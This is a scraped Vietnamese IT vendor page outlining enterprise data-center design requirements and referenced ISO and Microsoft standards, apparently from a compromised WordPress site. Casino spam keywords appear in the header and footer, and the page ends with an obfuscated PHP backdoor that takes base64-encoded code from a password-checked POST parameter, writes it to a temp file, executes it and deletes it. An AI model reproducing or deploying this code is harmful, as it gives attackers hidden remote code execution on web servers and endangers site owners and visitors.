Giải pháp xây dựng Trung tâm dữ liệu cho Doanh nghiệp - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Giải pháp xây dựng Trung tâm dữ liệu cho Doanh nghiệp

Ngày 07/02/2013 đăng bởi seo3.VS [email protected]

I. Yêu cầu giải pháp
Tận dụng được hạ tầng và trang thiết bị đã có đồng thời nâng cấp và kết hợp với trang thiết bị mới nhằm đáp ứng và đạt được các mục tiêu:

 1. Đảm bảo khả năng vận hành được của toàn bộ hệ thống CNTT ( Functionality)
 2. Đáp ứng được khả năng lưu trữ tập trung và hiệu xuất thi hành (Capacity) của toàn bộ hệ thống CNTT
 3. Đảm bảo được tính an toàn và bảo mật tuyệt đối cho toàn bộ hệ thống CNTT. ( Security)
 4. Khả năng mở rộng (Scalability) – tất cả các thành phần trong kiến trúc phải cho phép dễ dàng mở rộng khi có yêu cầu để đáp ứng nhu cầu phát triển liên tục của doanh nghiệp và các người dùng.
 5. Khả năng sao lưu dự phòng và phục hồi dữ liệu khi có sự cố. Bao gồm khả năng thiết lập trung tâm CNTT dự phòng ( Disaster Recovery Center)
 6. Nâng cao tính sẵn sàng phục vụ và chịu lỗi cao(Availability & Fail-over) của toàn bộ hệ thống CNTT như:
 • Hạ tầng mạng
 • Hệ thống thư điện tử
 • Hệ thống các ứng dụng
 • Hệ thống website
 • Hệ thống cơ sở dữ liệu đã và đang vận hành.

II. Các tiêu chuẩn thiết kế và căn cứ pháp lý

 1. Tiêu chuẩn quy định trong ISO/IEC 27000:2005(E) – Information technology –  Security techniques  – Information security management systems – Requirements (Công nghệ thông tin – Kỹ thuật bảo mật – Hệ thống quản lý an toàn thông tin – Các yêu cầu).
 2. Các hướng dẫn trong ISO/IEC 17799:2005(E) – Information technology – Security techniques – Code of practice for Information security management (Công nghệ thông tin – Kỹ thuật  bảo mật – Qui tắc thực tiễn cho Hệ thống quản lý an toàn thông tin).
 3. Giải pháp Microsoft Internet Data Center do Microsoft, Cisco, HP và EMC phối hợp biên soạn.
 4. Tài liệu hướng dẫn của Microsoft:
 • Designing a MS Windows Server 2003 AD and Network Infrastructure.
 • Implementing and Managing MS ISA Server 2006.
 • Implementing and Managing MS Exchange 2007.
 • Implementing and Managing MOM 2007
 • Microsoft Office communication Server 2007 Resource Kit
 • Managing Critical Applications and Infrastructure with Essentials 2007
 • Mô hình Microsoft Infrastructure Optimization.

III. Sơ đồ thiết kế:

A. Physical Deployment Environments

 

B. Infrastructure Architecture

Top of the Physical Architecture Stack

 

Physical Architecture: Data Center Stack

C. Windows Update (SUS cordinate with NAC) Infrastructure Architecture

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}